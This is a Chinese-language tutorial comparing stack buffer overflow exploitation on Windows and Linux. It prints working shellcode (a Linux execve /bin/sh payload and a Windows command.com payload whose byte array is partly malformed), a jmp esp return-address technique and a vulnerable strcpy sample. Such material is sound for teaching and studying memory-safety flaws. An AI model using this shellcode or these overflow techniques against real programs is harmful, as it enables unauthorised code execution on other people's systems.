linux堆栈和windows,Linux和Windows堆栈溢出利用对比

堆栈溢出的利用，有三大条件，一是返回点的定位，二是ShellCode的编写，三是跳转到ShellCode。

1．返回点的定位

在Windows下，F.ZH的在它经典的《菜鸟版Exploit编写指南之一》的文章中，详细的讲述了利用报错对话框精确定位溢出返回点的方法。

Windows下弹出报错对话框，显示“0x74737271”指令引用“0x74737271”内存，该地址不能为“read”。

里面隐含的意思就是返回点EIP被覆盖成了“0x74737271”，去执行的时候该地址是不能读的，就有错误了。“0x74737271”是什么呢？前面说了，就是字符串“qrst”，离我们填充的第一个字符“a”正好距离是“q”–“a”=0x71 – 0x61=0x10=16，所以在报错对话框的帮助下，我们可以轻松的知道，在覆盖了16个字符之后，就到达返回点的位置了。

在知道了返回点EIP的位置后，我们就可以覆盖返回点为任意值，让程序运行到一个错误的地方，从而出现报错提示。那如果我们特意把EIP覆盖成我们想去的程序的地方呢？当然就可以运行我们想要的程序了，而一般的，我们想要的程序称为ShellCode！看到胜利的曙光了吧？！

2．ShellCode的编写方法

Shell最先指人机交互的界面，而这里Shellcode不仅仅指交互，它还指可以实现任意功能的代码，可以涉及到很多方面。我们想要的程序功能最好是能够开一个DOS窗口，那我们可以做很多事情了。

在Windows下，开DOS窗口的程序如下：

#include

int main()

{

LoadLibrary(“msvcrt.dll”);

system(“command.com”);

return 0;

}

Windows下执行一个Command.com就可以获得一个DOS窗口，在C库函数里面，语句System(“command.com”)；将完成我们需要的功能。Windows是通过动态链接库DLL来提供系统函数的。System函数由Msvcrt.dll(The Microsoft VIsual C++ Runtime library)提供，所以要想执行System，我们必须首先使用LoadLibrary(“msvcrt.dll”)；装载动态链接库，svcrt.dll之后才能调用System函数。

我们执行上面的代码，看看效果吧：弹出来了一个DOS对话框！可以执行DIR，COPY等任意DOS命令。

我们要得到机器码形式的ShellCode，可以在VC中按F10调试，然后在Debug工具栏中，点最后一个按钮Disassemble，这样出现了源程序的汇编代码，再在代码窗口上点右键，在弹出菜单中选择Code Bytes，这样就出现了源程序的机器码。

原理上我们抄下来就可以了，但一般情况下，需要用汇编优化一下，并且处理好调用函数地址的问题，这样我们就可以得到Windows2000 SPN下，开DOS窗口的ShellCode了，没你想象中那么神秘吧？

代码

char shellcode[] =

{0x8B,0xE5, 0x55,0x8B,0xEC,0x83,0xEC,0x0C,0xB8,0x63,0x6F,0x6D,0x6D,6D,6D,6F,63,0x89,0x45,0xF4,0xB8,0x61,0x6E,0x64,0x2E,0x89,0x45,0xF8,0xB8,0x63,0x6F,0x6D,0x22,0x89,0x45,0xFC, 0x33,0xD2, 0x88,0x55,0xFF, 0x8D,0x45,0xF4, 0x50, 0xB8,0x24,0x98,0x01,0x78, 0xFF,0xD0 };

把它构造成可以实战使用的ShellCode还有很多问题要解决，比如通用性、编码、功能等，需要很高深的技术功底，但在本文这就不是重点了，也就不深入下去了。

我们的重点还是放在对比上吧，开一个Shell窗口的Linux代码如下：

＃include

char ShellCode[] =

{

"/x31/xc0" // xor %eax,%eax

"/x50" // push %eax

"/x68/x2f/x2f/x73/x68" // push $0x68732f2f

"/x68/x2f/x62/x69/x6e" // push $0x6e69622f

"/x89/xe3" // mov %esp,%ebx

"/x8d/x54/x24/x08" // lea 0x8(%esp,1),%edx

"/x50" // push %eax

"/x53" // push %ebx

"/x8d/x0c/x24" // lea (%esp,1),%ecx

"/xb0/x0b" // mov $0xb,%al

"/xcd/x80" // int $0x80

}

这就是Windows和Linux下ShellCode的来源。在实际编写Exploit过程中，Windows和Linux都有很多现成的ShellCode，我们直接拿来使用就可以了，但明白了原理总要好很多，如果有需要，可以自己改改功能，变换变换形式以符合编码要求，以后我们有机会再讨论，这涉及到很多有意思的东西。

3.Linux和Windows跳转到ShellCode方法对比

现在分析一下我们现在拥有的资源：

1．我们知道有问题程序返回点的精确位置，意思就是我们可以把它覆盖成任意地址，让计算机执行这个地址的代码。

2．我们有了ShellCode，一个可以给我们提供DOS窗口或新Shell的代码。

3．那接下来……就应该是把程序的返回点地址覆盖为ShellCode的地址了，这样在程序返回时，就可以执行我们的ShellCode了，意思就是我们就能得到一个Shell了！

分别看看Windows和Linux是如何实现跳转的吧。

在Windows下，ShellCode的地址一般最高位是0x00，这样就会把覆盖的字符串截断。所以以前很多人都提出了很多办法来定位ShellCode，但都不精确。随着技术的发展，1999年Dark Spyrit AKA Barnaby Jack提出了一个天才的想法：使用系统核心DLL里的指令来完成跳转！这一技巧开创了一个崭新的Windows缓冲区溢出的思路，并一直沿用到今天！

Windows的系统核心DLL包括Kernel32.dll、User32.dll、Gdi32.dll，这些DLL是一直位于内存中而且对应于固定的版本Windows加载的位置是固定的，而且最高位一般不是0x00。我们用系统核心DLL中的Jmp esp来覆盖返回地址，而把ShellCode紧跟在后面，这样就可以完成跳转到我们的ShellCode中的要求了。

其实现跳转的原理是这样的：当程序返回前，ESP指向原EIP的地方，函数返回就是执行RET＝Pop EIP，这样EIP就是Jmp esp地址；而ESP会往下移，指向ShellCode的第一个字节。

计算机不知道我们做了手脚，继续往下执行：EIP指向的指令Jmp esp，而此时的ESP正好指向了我们的ShellCode，那当然下一步就是执行我们的ShellCode了！这样间接的完成了向我们ShellCode的跳转。

我们在程序中把Name赋成这样的值，它看起来很奇怪，但会得到很奇妙的结果。我们执行它就会弹出我们想要的DOS对话框啦，哈哈！

写Main函数的程序员，他只会去负责读Name并赋给Output数组，根本不会感觉到Name数组中会隐藏这样精心构造的恶意代码，对于任何的Name，他都会把它读入并作为正常的东西处理，但就有可能会出现他想不到的结果。

再看看Linux下的跳转吧。对于Linux来说，程序中数组的地址最高位不是0x00，那要实现跳转就简单多了。我们定义一个ShellCode数组，把ShellCode的地址读出来，直接把返回点覆盖成地址就可以了！

我们先读出ShellCode数组的地址。在程序中添上ShellCode数组的定义，并打印出它的地址，即Printf(“%p/n”,shellcode)；如下。

#include

#include

char shellcode[] = “12345”;

char name[] = "ww0830";

int main()

{

char output[12];

strcpy(output, name);

printf("%s/n",output);

printf(“%p/n”,shellcode);

return 0;

}

执行后，程序打印出ShellCode的地址，在我的机器上为0x8049580，哈哈，果然没有0x00的字节啊！这样我们得到了在Linux下，Name数组的构造结构。

然后把ShellCode数组替换成真正打开Shell的代码即可。